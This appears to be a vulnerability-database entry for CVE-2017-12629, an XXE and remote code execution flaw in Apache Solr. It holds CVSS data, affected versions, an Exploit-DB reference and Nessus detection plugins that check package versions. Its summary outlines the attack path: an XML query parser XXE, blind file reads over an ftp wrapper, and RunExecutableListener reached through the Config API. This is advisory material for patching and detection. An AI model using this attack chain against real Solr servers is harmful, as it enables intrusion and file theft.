Vulnerabilities > CVE-2017-12629 - XXE vulnerability in multiple products

CVSS 9.8 - CRITICAL

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

HIGH

Integrity impact

HIGH

Availability impact

HIGH

network

low complexity

critical

nessus

exploit available

NVD

Published: 2017-10-14

Updated: 2023-11-07

Summary

Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.

Vulnerable Configurations

Part	Description	Count
Application	Apache Apache Solr 5.5.0 Apache Solr 5.5.1 Apache Solr 5.5.2 Apache Solr 5.5.3 Apache Solr 5.5.4 Apache Solr 6.0.0 Apache Solr 6.0.1 Apache Solr 6.1.0 Apache Solr 6.2.0 Apache Solr 6.2.1 Apache Solr 6.3.0 Apache Solr 6.4.0 Apache Solr 6.4.1 Apache Solr 6.4.2 Apache Solr 6.5.0 Apache Solr 6.5.1 Apache Solr 6.6.0 Apache Solr 6.6.1 Apache Solr 7.0.0 Apache Solr 7.0.1	20
Application	Redhat Redhat Jboss Enterprise Application Platform 7.0.0 Redhat Jboss Enterprise Application Platform 7.1.0	2
OS	Redhat Redhat Enterprise Linux Server 6.0 Redhat Enterprise Linux Server 7.0	2
OS	Debian Debian Debian Linux 8.0 Debian Debian Linux 7.0 Debian Debian Linux 9.0	3
OS	Canonical Canonical Ubuntu Linux 16.04	1

Common Weakness Enumeration (CWE)

CWE-611 - Improper Restriction of XML External Entity Reference ('XXE')

Exploit-Db

description	Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution. CVE-2017-12629. Webapps exploit for XML platform
file	exploits/xml/webapps/43009.txt
id	EDB-ID:43009
last seen	2017-10-17
modified	2017-10-17
platform	xml
port
published	2017-10-17
reporter	Exploit-DB
source	https://www.exploit-db.com/download/43009/
title	Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
type	webapps

Nessus

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2018-0004.NASL
description	An update is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.0.9 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.8, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr
last seen	2020-06-01
modified	2020-06-02
plugin id	105560
published	2018-01-04
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/105560
title	RHEL 7 : JBoss EAP (RHSA-2018:0004)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2018:0004. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(105560); script_version("3.14"); script_cvs_date("Date: 2019/10/24 15:35:44"); script_cve_id("CVE-2016-6346", "CVE-2017-12165", "CVE-2017-12167", "CVE-2017-12189", "CVE-2017-12629", "CVE-2017-7559", "CVE-2017-7561"); script_xref(name:"RHSA", value:"2018:0004"); script_xref(name:"IAVA", value:"2017-A-0319"); script_name(english:"RHEL 7 : JBoss EAP (RHSA-2018:0004)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "An update is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.0.9 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.8, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr's Config API. (CVE-2017-12629) * It was discovered that the jboss init script performed unsafe file handling which could result in local privilege escalation. (CVE-2017-12189) * It was found that GZIPInterceptor is enabled when not necessarily required in RESTEasy. An attacker could use this flaw to launch a Denial of Service attack. (CVE-2016-6346) * It was found that the fix for CVE-2017-2666 was incomplete and invalid characters are still allowed in the query string and path parameters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own. (CVE-2017-7559) * It was discovered that the CORS Filter did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances. (CVE-2017-7561) * It was found that properties based files of the management and the application realm configuration that contain user to role mapping are world readable allowing access to users and roles information to all the users logged in to the system. (CVE-2017-12167) * It was discovered that Undertow processes http request headers with unusual whitespaces which can cause possible http request smuggling. (CVE-2017-12165) Red Hat would like to thank Mikhail Egorov (Odin) for reporting CVE-2016-6346. The CVE-2017-7559 and CVE-2017-12165 issues were discovered by Stuart Douglas (Red Hat); the CVE-2017-7561 issue was discovered by Jason Shepherd (Red Hat Product Security); and the CVE-2017-12167 issue was discovered by Brian Stansberry (Red Hat) and Jeremy Choi (Red Hat)." ); # https://access.redhat.com/documentation/en/ script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/documentation/en-us/" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2018:0004" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-6346" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-7559" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-7561" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-12165" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-12167" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-12189" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-12629" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-cli"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-commons"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-core-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-dto"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hornetq-protocol"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hqclient-protocol"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-journal"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-native"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-ra"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-selector"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-service-extensions"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-core"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-entitymanager"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-envers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-infinispan"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-java8"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-impl"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-spi"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-impl"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-deployers-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-jdbc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-validator"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-remoting"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-xnio-base"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-jgroups"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-async-http-servlet-3.0"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-atom-provider"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-cdi"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-crypto"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson-provider"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson2-provider"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxb-provider"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxrs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jettison-provider"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jose-jwt"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jsapi"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-json-p-provider"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-multipart-provider"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-spring"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-validator-provider-11"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-yaml-provider"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-undertow"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-javadocs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-modules"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/07"); script_set_attribute(attribute:"patch_publication_date", value:"2018/01/03"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/01/04"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 7.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2018:0004"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (! (rpm_exists(release:"RHEL7", rpm:"jbossas-welcome-content-eap"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, "JBoss EAP"); if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-cli-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-commons-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-core-client-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-dto-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-hornetq-protocol-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-hqclient-protocol-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-jms-client-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-jms-server-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-journal-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-native-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-ra-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-selector-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-server-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-service-extensions-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-core-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-entitymanager-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-envers-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-infinispan-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-java8-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-common-api-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-common-impl-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-common-spi-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-core-api-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-core-impl-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-deployers-common-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-jdbc-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-validator-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-jboss-remoting-4.0.25-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-jboss-xnio-base-3.4.7-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-jgroups-3.6.12-1.Final_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-async-http-servlet-3.0-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-atom-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-cdi-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-client-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-crypto-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jackson-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jackson2-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jaxb-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jaxrs-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jettison-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jose-jwt-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jsapi-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-json-p-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-multipart-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-spring-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-validator-provider-11-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-yaml-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-undertow-1.3.31-3.Final_redhat_3.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-wildfly-7.0.9-4.GA_redhat_3.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-wildfly-javadocs-7.0.9-2.GA_redhat_3.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-wildfly-modules-7.0.9-4.GA_redhat_3.1.ep7.el7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "eap7-activemq-artemis / eap7-activemq-artemis-cli / etc"); } }

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-C7BDF540B4.NASL
description	Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2017-11-01
plugin id	104315
published	2017-11-01
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/104315
title	Fedora 26 : lucene (2017-c7bdf540b4)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory FEDORA-2017-c7bdf540b4. # include("compat.inc"); if (description) { script_id(104315); script_version("3.9"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-12629"); script_xref(name:"FEDORA", value:"2017-c7bdf540b4"); script_xref(name:"IAVA", value:"2017-A-0319"); script_name(english:"Fedora 26 : lucene (2017-c7bdf540b4)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-c7bdf540b4" ); script_set_attribute( attribute:"solution", value:"Update the affected lucene package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:lucene"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:26"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/14"); script_set_attribute(attribute:"patch_publication_date", value:"2017/10/31"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/01"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! preg(pattern:"^26([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 26", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC26", reference:"lucene-6.1.0-6.fc26")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "lucene"); }

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2017-3123.NASL
description	A security update is now available for Red Hat JBoss Enterprise Application Platform 7 for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. [Updated 6th November 2017] Previously, this erratum was marked as having a security impact of Critical. This was incorrect; Red Hat JBoss Enterprise Application Platform 7 was affected with a security impact of Moderate. This advisory has been updated to that effect. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This asynchronous patch is a security update for lucene package in Red Hat JBoss Enterprise Application Platform 7.0.8. Security Fix(es) : * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr
last seen	2020-06-01
modified	2020-06-02
plugin id	104457
published	2017-11-08
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/104457
title	RHEL 6 / 7 : JBoss EAP (RHSA-2017:3123)
